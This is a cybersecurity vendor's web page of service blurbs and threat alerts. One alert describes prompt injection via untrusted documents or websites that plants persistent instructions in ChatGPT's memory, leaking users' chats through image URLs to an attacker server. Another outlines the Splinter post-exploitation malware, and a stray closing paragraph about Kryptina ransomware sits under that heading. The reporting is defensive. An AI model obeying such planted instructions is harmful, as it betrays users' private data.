SecOps & Risk mitigation
CyberProof uses OSINT and threat intelligence feeds for visibility into threats.
CyberProof’s adaptable playbooks address continuously evolving threats with updated strategies.
Professionals manage sophisticated networks, leveraging experience to counter advanced threats.
Professionals manage sophisticated networks, leveraging experience to counter advanced threats.
24/7 global SOC support ensures incident response with guaranteed SLA.
24/7 global SOC support ensures incident response with guaranteed SLA.
CyberProof develops recovery plans, restoring capabilities after a cyber incident.
Classify and manage enterprise assets, understanding risks and data sensitivity.
Non-destructive tests uncover potential exploits in assets and applications.
Mitigate security issues early with CyberProof’s training and awareness programs.
Rigorous security assessment for on-premise and cloud applications to ensure protection.
IAM manages user access, monitors for anomalies, ensuring security.
Cloud First approach ensures compliance and security within cloud environments.
Managed service for SIEM, EDR, MXDR, and threat intelligence solutions.
Identify, assess, and mitigate security vulnerabilities through regular scanning.
Partners
See all partnersCase Studies
90% increase in visibility after deploying Microsoft XDR with CyberProof
Enterprise saves millions on data ingestion & storage following cloud migration.
International logistics company sees 40% savings in security operations costs
Threat Alerts
Spyware Injection Employed for Data Exfiltration on ChatGPT
Researchers have raised awareness on an ongoing rise in threat actors using prompt injection from untrusted data to implant long-lasting spyware into ChatGPT’s memory. This enables ongoing exfiltration of any information the user inputs or receives from ChatGPT, including future chat sessions.
This exfiltration method isn’t new and it typically involves rendering an image to an attacker-controlled server and instructing ChatGPT to include the user’s data as a query parameter.
The process begins when a user interacts with an untrusted document or visits a compromised website. The site provides instructions that gain control of ChatGPT, embedding malicious code to extract future chat data and send it to the attacker. As the user continues to use ChatGPT, all the data is secretly transmitted to the attacker, allowing them to retrieve all future information.
Splinter : A Rust-based Post-Exploitation Framework with Advanced Capabilities
Splinter is a sophisticated post-exploitation tool developed in Rust, a programming language known for its emphasis on memory safety. The malware utilizes a JSON-based configuration structure containing essential operational details, and upon execution, it parses this data to establish a connection with the attacker’s command-and-control (C2) server over HTTPS using login credentials. Once connected, Splinter is controlled by a task-based model, allowing attackers to issue various post-exploitation commands. Its functionality includes executing Windows commands, injecting modules via remote process injection, file transfers, cloud account data collection, and self-deletion from the compromised system.
Splinter leverages several notable post-exploitation features. It can execute Windows commands, upload and download files, inject modules into remote processes, and gather sensitive information from cloud service accounts. For communication with its C2 server, Splinter uses specific URL paths to handle task synchronization, status updates, and file transfers. All communication is encrypted via HTTPS, providing a secure channel for the malware to receive instructions and upload stolen data. Additionally, it utilizes the classic process injection technique to run additional modules. This architecture allows Splinter to maintain persistence and covert control over compromised systems.
The impact of this attack is significant, as both Linux and Windows systems are affected by the encryption of vital files, leading to system inoperability and potential data loss. The automation provided by the Kryptina platform allows attackers to scale their campaigns efficiently, targeting multiple victims simultaneously with customized ransomware builds. This streamlined infection chain — from initial access to payload deployment and file encryption — enables threat actors to maximize the damage and financial impact on enterprises. The ability to seamlessly integrate Kryptina’s modular architecture into both Linux and Windows environments further complicates defense efforts, as attackers can easily adapt their tools to evade detection and ensure the success of their campaigns.